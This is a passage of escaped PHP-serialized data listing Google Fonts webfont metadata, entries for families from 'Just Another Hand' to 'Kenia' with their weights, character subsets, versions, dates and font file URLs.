Hand\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:91:\"http://fonts.gstatic.com/s/justanotherhand/v19/845CNN4-AJyIGvIou-6yJKyptyOpOcr_BmmlS5aw.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:580;O:8:\"stdClass\":8:{s:6:\"family\";s:23:\"Just Me Again Down Here\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:103:\"http://fonts.gstatic.com/s/justmeagaindownhere/v24/MwQmbgXtz-Wc6RUEGNMc0QpRrfUh2hSdBBMoAuwHvqDwc_fg.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:581;O:8:\"stdClass\":8:{s:6:\"family\";s:3:\"K2D\";s:8:\"variants\";a:16:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:7:\"regular\";i:7;s:6:\"italic\";i:8;s:3:\"500\";i:9;s:9:\"500italic\";i:10;s:3:\"600\";i:11;s:9:\"600italic\";i:12;s:3:\"700\";i:13;s:9:\"700italic\";i:14;s:3:\"800\";i:15;s:9:\"800italic\";}s:7:\"subsets\";a:4:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:4:\"thai\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v9\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":16:{s:3:\"100\";s:62:\"http://fonts.gstatic.com/s/k2d/v9/J7aRnpF2V0ErE6UpvrIw74NL.ttf\";s:9:\"100italic\";s:65:\"http://fonts.gstatic.com/s/k2d/v9/J7afnpF2V0EjdZ1NtLYS6pNLAjk.ttf\";s:3:\"200\";s:64:\"http://fonts.gstatic.com/s/k2d/v9/J7aenpF2V0Erv4QJlJw85ppSGw.ttf\";s:9:\"200italic\";s:66:\"http://fonts.gstatic.com/s/k2d/v9/J7acnpF2V0EjdZ3hlZY4xJ9CGyAa.ttf\";s:3:\"300\";s:64:\"http://fonts.gstatic.com/s/k2d/v9/J7aenpF2V0Er24cJlJw85ppSGw.ttf\";s:9:\"300italic\";s:66:\"http://fonts.gstatic.com/s/k2d/v9/J7acnpF2V0EjdZ2FlpY4xJ9CGyAa.ttf\";s:7:\"regular\";s:60:\"http://fonts.gstatic.com/s/k2d/v9/J7aTnpF2V0ETd68tnLcg7w.ttf\";s:6:\"italic\";s:62:\"http://fonts.gstatic.com/s/k2d/v9/J7aRnpF2V0EjdaUpvrIw74NL.ttf\";s:3:\"500\";s:64:\"http://fonts.gstatic.com/s/k2d/v9/J7aenpF2V0Erg4YJlJw85ppSGw.ttf\";s:9:\"500italic\";s:66:\"http://fonts.gstatic.com/s/k2d/v9/J7acnpF2V0EjdZ3dl5Y4xJ9CGyAa.ttf\";s:3:\"600\";s:64:\"http://fonts.gstatic.com/s/k2d/v9/J7aenpF2V0Err4EJlJw85ppSGw.ttf\";s:9:\"600italic\";s:66:\"http://fonts.gstatic.com/s/k2d/v9/J7acnpF2V0EjdZ3xkJY4xJ9CGyAa.ttf\";s:3:\"700\";s:64:\"http://fonts.gstatic.com/s/k2d/v9/J7aenpF2V0Ery4AJlJw85ppSGw.ttf\";s:9:\"700italic\";s:66:\"http://fonts.gstatic.com/s/k2d/v9/J7acnpF2V0EjdZ2VkZY4xJ9CGyAa.ttf\";s:3:\"800\";s:64:\"http://fonts.gstatic.com/s/k2d/v9/J7aenpF2V0Er14MJlJw85ppSGw.ttf\";s:9:\"800italic\";s:66:\"http://fonts.gstatic.com/s/k2d/v9/J7acnpF2V0EjdZ2JkpY4xJ9CGyAa.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:582;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Kadwa\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:2:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/kadwa/v10/rnCm-x5V0g7iphTHRcc2s2XH.ttf\";s:3:\"700\";s:69:\"http://fonts.gstatic.com/s/kadwa/v10/rnCr-x5V0g7ipix7auM-mHnOSOuk.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:583;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Kaisei Decol\";s:8:\"variants\";a:3:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"700\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:8:\"japanese\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v8\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":3:{s:7:\"regular\";s:80:\"http://fonts.gstatic.com/s/kaiseidecol/v8/bMrwmSqP45sidWf3QmfFW6iyW1EP22OjoA.ttf\";s:3:\"500\";s:84:\"http://fonts.gstatic.com/s/kaiseidecol/v8/bMrvmSqP45sidWf3QmfFW6iKr3gr00i_qb57kA.ttf\";s:3:\"700\";s:84:\"http://fonts.gstatic.com/s/kaiseidecol/v8/bMrvmSqP45sidWf3QmfFW6iK534r00i_qb57kA.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:584;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Kaisei HarunoUmi\";s:8:\"variants\";a:3:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"700\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:8:\"japanese\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v8\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":3:{s:7:\"regular\";s:89:\"http://fonts.gstatic.com/s/kaiseiharunoumi/v8/HI_RiZQSLqBQoAHhK_C6N_nzy_jcGsv5sM8u3mk.ttf\";s:3:\"500\";s:93:\"http://fonts.gstatic.com/s/kaiseiharunoumi/v8/HI_WiZQSLqBQoAHhK_C6N_nzy_jcIj_QlMcFwmC9FAU.ttf\";s:3:\"700\";s:93:\"http://fonts.gstatic.com/s/kaiseiharunoumi/v8/HI_WiZQSLqBQoAHhK_C6N_nzy_jcInfWlMcFwmC9FAU.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:585;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Kaisei Opti\";s:8:\"variants\";a:3:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"700\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:8:\"japanese\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v8\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":3:{s:7:\"regular\";s:77:\"http://fonts.gstatic.com/s/kaiseiopti/v8/QldKNThJphYb8_g6c2nlIFle7KlmxuHx.ttf\";s:3:\"500\";s:81:\"http://fonts.gstatic.com/s/kaiseiopti/v8/QldXNThJphYb8_g6c2nlIGGqxY1u7f34DYwn.ttf\";s:3:\"700\";s:81:\"http://fonts.gstatic.com/s/kaiseiopti/v8/QldXNThJphYb8_g6c2nlIGHiw41u7f34DYwn.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:586;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Kaisei Tokumin\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"700\";i:3;s:3:\"800\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:8:\"japanese\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v8\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:84:\"http://fonts.gstatic.com/s/kaiseitokumin/v8/Gg8sN5wdZg7xCwuMsylww2ZiQkJf1l0pj946.ttf\";s:3:\"500\";s:88:\"http://fonts.gstatic.com/s/kaiseitokumin/v8/Gg8vN5wdZg7xCwuMsylww2ZiQnqr_3khpMIzeI6v.ttf\";s:3:\"700\";s:88:\"http://fonts.gstatic.com/s/kaiseitokumin/v8/Gg8vN5wdZg7xCwuMsylww2ZiQnrj-XkhpMIzeI6v.ttf\";s:3:\"800\";s:88:\"http://fonts.gstatic.com/s/kaiseitokumin/v8/Gg8vN5wdZg7xCwuMsylww2ZiQnr_-nkhpMIzeI6v.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:587;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Kalam\";s:8:\"variants\";a:3:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":3:{s:3:\"300\";s:69:\"http://fonts.gstatic.com/s/kalam/v16/YA9Qr0Wd4kDdMtD6GgLLmCUItqGt.ttf\";s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/kalam/v16/YA9dr0Wd4kDdMuhWMibDszkB.ttf\";s:3:\"700\";s:69:\"http://fonts.gstatic.com/s/kalam/v16/YA9Qr0Wd4kDdMtDqHQLLmCUItqGt.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:588;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Kameron\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/kameron/v15/vm82dR7vXErQxuznsL4wL-XIYH8.ttf\";s:3:\"700\";s:74:\"http://fonts.gstatic.com/s/kameron/v15/vm8zdR7vXErQxuzniAIfC-3jfHb--NY.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:589;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Kanit\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:7:\"regular\";i:7;s:6:\"italic\";i:8;s:3:\"500\";i:9;s:9:\"500italic\";i:10;s:3:\"600\";i:11;s:9:\"600italic\";i:12;s:3:\"700\";i:13;s:9:\"700italic\";i:14;s:3:\"800\";i:15;s:9:\"800italic\";i:16;s:3:\"900\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:4:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:4:\"thai\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:68:\"http://fonts.gstatic.com/s/kanit/v12/nKKX-Go6G5tXcr72GwWKcaxALFs.ttf\";s:9:\"100italic\";s:71:\"http://fonts.gstatic.com/s/kanit/v12/nKKV-Go6G5tXcraQI2GAdY5FPFtrGw.ttf\";s:3:\"200\";s:69:\"http://fonts.gstatic.com/s/kanit/v12/nKKU-Go6G5tXcr5aOiWgX6BJNUJy.ttf\";s:9:\"200italic\";s:72:\"http://fonts.gstatic.com/s/kanit/v12/nKKS-Go6G5tXcraQI82hVaRrMFJyAu4.ttf\";s:3:\"300\";s:69:\"http://fonts.gstatic.com/s/kanit/v12/nKKU-Go6G5tXcr4-OSWgX6BJNUJy.ttf\";s:9:\"300italic\";s:72:\"http://fonts.gstatic.com/s/kanit/v12/nKKS-Go6G5tXcraQI6miVaRrMFJyAu4.ttf\";s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/kanit/v12/nKKZ-Go6G5tXcoaSEQGodLxA.ttf\";s:6:\"italic\";s:68:\"http://fonts.gstatic.com/s/kanit/v12/nKKX-Go6G5tXcraQGwWKcaxALFs.ttf\";s:3:\"500\";s:69:\"http://fonts.gstatic.com/s/kanit/v12/nKKU-Go6G5tXcr5mOCWgX6BJNUJy.ttf\";s:9:\"500italic\";s:72:\"http://fonts.gstatic.com/s/kanit/v12/nKKS-Go6G5tXcraQI_GjVaRrMFJyAu4.ttf\";s:3:\"600\";s:69:\"http://fonts.gstatic.com/s/kanit/v12/nKKU-Go6G5tXcr5KPyWgX6BJNUJy.ttf\";s:9:\"600italic\";s:72:\"http://fonts.gstatic.com/s/kanit/v12/nKKS-Go6G5tXcraQI92kVaRrMFJyAu4.ttf\";s:3:\"700\";s:69:\"http://fonts.gstatic.com/s/kanit/v12/nKKU-Go6G5tXcr4uPiWgX6BJNUJy.ttf\";s:9:\"700italic\";s:72:\"http://fonts.gstatic.com/s/kanit/v12/nKKS-Go6G5tXcraQI7mlVaRrMFJyAu4.ttf\";s:3:\"800\";s:69:\"http://fonts.gstatic.com/s/kanit/v12/nKKU-Go6G5tXcr4yPSWgX6BJNUJy.ttf\";s:9:\"800italic\";s:72:\"http://fonts.gstatic.com/s/kanit/v12/nKKS-Go6G5tXcraQI6WmVaRrMFJyAu4.ttf\";s:3:\"900\";s:69:\"http://fonts.gstatic.com/s/kanit/v12/nKKU-Go6G5tXcr4WPCWgX6BJNUJy.ttf\";s:9:\"900italic\";s:72:\"http://fonts.gstatic.com/s/kanit/v12/nKKS-Go6G5tXcraQI4GnVaRrMFJyAu4.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:590;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Kantumruy\";s:8:\"variants\";a:3:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"700\";}s:7:\"subsets\";a:1:{i:0;s:5:\"khmer\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":3:{s:3:\"300\";s:79:\"http://fonts.gstatic.com/s/kantumruy/v21/syk0-yJ0m7wyVb-f4FOPUtDlpn-UJ1H6Uw.ttf\";s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/kantumruy/v21/sykx-yJ0m7wyVb-f4FO3_vjBrlSILg.ttf\";s:3:\"700\";s:79:\"http://fonts.gstatic.com/s/kantumruy/v21/syk0-yJ0m7wyVb-f4FOPQtflpn-UJ1H6Uw.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:591;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Kantumruy Pro\";s:8:\"variants\";a:14:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:9:\"100italic\";i:8;s:9:\"200italic\";i:9;s:9:\"300italic\";i:10;s:6:\"italic\";i:11;s:9:\"500italic\";i:12;s:9:\"600italic\";i:13;s:9:\"700italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"khmer\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v3\";s:12:\"lastModified\";s:10:\"2022-06-28\";s:5:\"files\";O:8:\"stdClass\":14:{s:3:\"100\";s:99:\"http://fonts.gstatic.com/s/kantumruypro/v3/1q2TY5aECkp34vEBSPFOmJxwvk_pilU8OGNfyg1urUs0M34dR6dW.ttf\";s:3:\"200\";s:99:\"http://fonts.gstatic.com/s/kantumruypro/v3/1q2TY5aECkp34vEBSPFOmJxwvk_pilU8OGNfyg3urEs0M34dR6dW.ttf\";s:3:\"300\";s:99:\"http://fonts.gstatic.com/s/kantumruypro/v3/1q2TY5aECkp34vEBSPFOmJxwvk_pilU8OGNfyg0wrEs0M34dR6dW.ttf\";s:7:\"regular\";s:99:\"http://fonts.gstatic.com/s/kantumruypro/v3/1q2TY5aECkp34vEBSPFOmJxwvk_pilU8OGNfyg1urEs0M34dR6dW.ttf\";s:3:\"500\";s:99:\"http://fonts.gstatic.com/s/kantumruypro/v3/1q2TY5aECkp34vEBSPFOmJxwvk_pilU8OGNfyg1crEs0M34dR6dW.ttf\";s:3:\"600\";s:99:\"http://fonts.gstatic.com/s/kantumruypro/v3/1q2TY5aECkp34vEBSPFOmJxwvk_pilU8OGNfyg2wq0s0M34dR6dW.ttf\";s:3:\"700\";s:99:\"http://fonts.gstatic.com/s/kantumruypro/v3/1q2TY5aECkp34vEBSPFOmJxwvk_pilU8OGNfyg2Jq0s0M34dR6dW.ttf\";s:9:\"100italic\";s:102:\"http://fonts.gstatic.com/s/kantumruypro/v3/1q2RY5aECkp34vEBSPFOmJxwlEbbdY1VU_nxzRim76N2OXo_QrdWlcU.ttf\";s:9:\"200italic\";s:102:\"http://fonts.gstatic.com/s/kantumruypro/v3/1q2RY5aECkp34vEBSPFOmJxwlEbbdY1VU_nxzRim7yN3OXo_QrdWlcU.ttf\";s:9:\"300italic\";s:102:\"http://fonts.gstatic.com/s/kantumruypro/v3/1q2RY5aECkp34vEBSPFOmJxwlEbbdY1VU_nxzRim7_13OXo_QrdWlcU.ttf\";s:6:\"italic\";s:102:\"http://fonts.gstatic.com/s/kantumruypro/v3/1q2RY5aECkp34vEBSPFOmJxwlEbbdY1VU_nxzRim76N3OXo_QrdWlcU.ttf\";s:9:\"500italic\";s:102:\"http://fonts.gstatic.com/s/kantumruypro/v3/1q2RY5aECkp34vEBSPFOmJxwlEbbdY1VU_nxzRim75F3OXo_QrdWlcU.ttf\";s:9:\"600italic\";s:102:\"http://fonts.gstatic.com/s/kantumruypro/v3/1q2RY5aECkp34vEBSPFOmJxwlEbbdY1VU_nxzRim731wOXo_QrdWlcU.ttf\";s:9:\"700italic\";s:102:\"http://fonts.gstatic.com/s/kantumruypro/v3/1q2RY5aECkp34vEBSPFOmJxwlEbbdY1VU_nxzRim70RwOXo_QrdWlcU.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:592;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Karantina\";s:8:\"variants\";a:3:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:6:\"hebrew\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v11\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":3:{s:3:\"300\";s:79:\"http://fonts.gstatic.com/s/karantina/v11/buExpo24ccnh31GVMABxXCgf-P5Oaiw4cw.ttf\";s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/karantina/v11/buE0po24ccnh31GVMABJ8AA78NVSYw.ttf\";s:3:\"700\";s:79:\"http://fonts.gstatic.com/s/karantina/v11/buExpo24ccnh31GVMABxTC8f-P5Oaiw4cw.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:593;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Karla\";s:8:\"variants\";a:14:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:9:\"200italic\";i:8;s:9:\"300italic\";i:9;s:6:\"italic\";i:10;s:9:\"500italic\";i:11;s:9:\"600italic\";i:12;s:9:\"700italic\";i:13;s:9:\"800italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v23\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":14:{s:3:\"200\";s:83:\"http://fonts.gstatic.com/s/karla/v23/qkBIXvYC6trAT55ZBi1ueQVIjQTDeJqqFENLR7fHGw.ttf\";s:3:\"300\";s:83:\"http://fonts.gstatic.com/s/karla/v23/qkBIXvYC6trAT55ZBi1ueQVIjQTDppqqFENLR7fHGw.ttf\";s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/karla/v23/qkBIXvYC6trAT55ZBi1ueQVIjQTD-JqqFENLR7fHGw.ttf\";s:3:\"500\";s:83:\"http://fonts.gstatic.com/s/karla/v23/qkBIXvYC6trAT55ZBi1ueQVIjQTDypqqFENLR7fHGw.ttf\";s:3:\"600\";s:83:\"http://fonts.gstatic.com/s/karla/v23/qkBIXvYC6trAT55ZBi1ueQVIjQTDJp2qFENLR7fHGw.ttf\";s:3:\"700\";s:83:\"http://fonts.gstatic.com/s/karla/v23/qkBIXvYC6trAT55ZBi1ueQVIjQTDH52qFENLR7fHGw.ttf\";s:3:\"800\";s:83:\"http://fonts.gstatic.com/s/karla/v23/qkBIXvYC6trAT55ZBi1ueQVIjQTDeJ2qFENLR7fHGw.ttf\";s:9:\"200italic\";s:85:\"http://fonts.gstatic.com/s/karla/v23/qkBKXvYC6trAT7RQNNK2EG7SIwPWMNnCV0lPZbLXGxGR.ttf\";s:9:\"300italic\";s:85:\"http://fonts.gstatic.com/s/karla/v23/qkBKXvYC6trAT7RQNNK2EG7SIwPWMNkcV0lPZbLXGxGR.ttf\";s:6:\"italic\";s:85:\"http://fonts.gstatic.com/s/karla/v23/qkBKXvYC6trAT7RQNNK2EG7SIwPWMNlCV0lPZbLXGxGR.ttf\";s:9:\"500italic\";s:85:\"http://fonts.gstatic.com/s/karla/v23/qkBKXvYC6trAT7RQNNK2EG7SIwPWMNlwV0lPZbLXGxGR.ttf\";s:9:\"600italic\";s:85:\"http://fonts.gstatic.com/s/karla/v23/qkBKXvYC6trAT7RQNNK2EG7SIwPWMNmcUElPZbLXGxGR.ttf\";s:9:\"700italic\";s:85:\"http://fonts.gstatic.com/s/karla/v23/qkBKXvYC6trAT7RQNNK2EG7SIwPWMNmlUElPZbLXGxGR.ttf\";s:9:\"800italic\";s:85:\"http://fonts.gstatic.com/s/karla/v23/qkBKXvYC6trAT7RQNNK2EG7SIwPWMNnCUElPZbLXGxGR.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:594;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Karma\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"300\";s:69:\"http://fonts.gstatic.com/s/karma/v16/va9F4kzAzMZRGLjDY8Z_uqzGQC_-.ttf\";s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/karma/v16/va9I4kzAzMZRGIBvS-J3kbDP.ttf\";s:3:\"500\";s:69:\"http://fonts.gstatic.com/s/karma/v16/va9F4kzAzMZRGLibYsZ_uqzGQC_-.ttf\";s:3:\"600\";s:69:\"http://fonts.gstatic.com/s/karma/v16/va9F4kzAzMZRGLi3ZcZ_uqzGQC_-.ttf\";s:3:\"700\";s:69:\"http://fonts.gstatic.com/s/karma/v16/va9F4kzAzMZRGLjTZMZ_uqzGQC_-.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:595;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Katibeh\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:6:\"arabic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/katibeh/v17/ZGjXol5MQJog4bxDaC1RVDNdGDs.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:596;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Kaushan Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:85:\"http://fonts.gstatic.com/s/kaushanscript/v14/vm8vdRfvXFLG3OLnsO15WYS5DF7_ytN3M48a.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:597;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Kavivanar\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:5:\"tamil\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/kavivanar/v18/o-0IIpQgyXYSwhxP7_Jb4j5Ba_2c7A.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:598;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Kavoon\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/kavoon/v21/pxiFyp4_scRYhlU4NLr6f1pdEQ.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:599;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Kdam Thmor Pro\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"khmer\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v1\";s:12:\"lastModified\";s:10:\"2022-05-31\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/kdamthmorpro/v1/EJRPQgAzVdcI-Qdvt34jzurnGA7_j89I8ZWb.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:600;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Keania One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/keaniaone/v20/zOL54pXJk65E8pXardnuycRuv-hHkOs.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:601;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Kelly Slab\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:8:\"cyrillic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/kellyslab/v15/-W_7XJX0Rz3cxUnJC5t6TkMBf50kbiM.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:602;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Kenia\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/